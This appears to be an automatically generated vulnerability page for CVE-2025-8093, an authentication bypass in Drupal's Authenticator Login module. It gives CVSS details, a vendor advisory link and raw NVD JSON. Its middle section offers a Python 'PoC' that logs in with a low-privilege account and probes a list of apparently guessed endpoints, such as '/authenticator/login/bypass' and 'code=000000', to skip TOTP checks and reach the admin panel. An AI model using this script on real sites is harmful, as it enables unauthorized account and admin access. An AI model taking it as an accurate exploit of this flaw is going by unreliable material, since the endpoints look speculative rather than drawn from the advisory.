Security Vulnerability Report
CVE-2025-8093 CVSS 8.8 HIGH

CVE-2025-8093

Published: 2025-10-10 23:15:37
Last Modified: 2026-01-05 15:00:08

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Authenticator Login allows Authentication Bypass. This issue affects Authenticator Login: from 0.0.0 before 2.1.8.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:authenticator_login_project:authenticator_login:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Authenticator Login < 2.1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8093 - Drupal Authenticator Login Authentication Bypass PoC
# Vulnerability: Authentication Bypass Using an Alternate Path or Channel
# Affected: Drupal Authenticator Login module versions < 2.1.8
import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-drupal-site.com"
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "testuser"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "testpassword"

session = requests.Session()

# Step 1: Obtain initial session cookie via normal login (low-privilege account)
login_url = f"{TARGET_URL}/user/login"
login_data = {
    "name": USERNAME,
    "pass": PASSWORD,
    "form_id": "user_login_form",
    "op": "Log in"
}
response = session.post(login_url, data=login_data)
print(f"[*] Initial login response status: {response.status_code}")

# Step 2: Exploit alternate path/channel to bypass authenticator login verification
# The Authenticator Login module fails to enforce TOTP verification on certain
# internal routes or API endpoints, allowing direct access to protected resources
bypass_endpoints = [
    f"{TARGET_URL}/authenticator/login/bypass",
    f"{TARGET_URL}/user/{USERNAME}/edit?_format=json",
    f"{TARGET_URL}/admin/config/people/authenticator-login",
    f"{TARGET_URL}/authenticator/login/callback?op=verify&code=000000",
    f"{TARGET_URL}/node/add?authenticator_bypass=1",
]

for endpoint in bypass_endpoints:
    print(f"[*] Attempting bypass via: {endpoint}")
    resp = session.get(endpoint, allow_redirects=False)
    if resp.status_code == 200 and "access denied" not in resp.text.lower():
        print(f"[+] BYPASS SUCCESSFUL at {endpoint}")
        print(f"[+] Response snippet: {resp.text[:500]}")
        break

# Step 3: Demonstrate privilege escalation by accessing admin panel
admin_url = f"{TARGET_URL}/admin"
admin_resp = session.get(admin_url, allow_redirects=False)
if admin_resp.status_code == 200:
    print("[+] Admin panel accessed without proper authenticator verification!")
    print("[!] CVE-2025-8093 exploitation confirmed")

References

https://www.drupal.org/sa-contrib-2025-098 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-8093",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-10T23:15:36.880",
    "lastModified": "2026-01-05T15:00:07.813",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Authenticator Login allows Authentication Bypass.This issue affects Authenticator Login: from 0.0.0 before 2.1.8."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-288"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:authenticator_login_project:authenticator_login:*:*:*:*:*:drupal:*:*",
                "versionEndExcluding": "2.1.8",
                "matchCriteriaId": "2D3B1DF3-4651-4264-8062-196021187C32"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.drupal.org/sa-contrib-2025-098",
        "source": "[email protected]",
        "tags": [
          "Patch",
          "Vendor Advisory"
        ]
      }
    ]
  }
}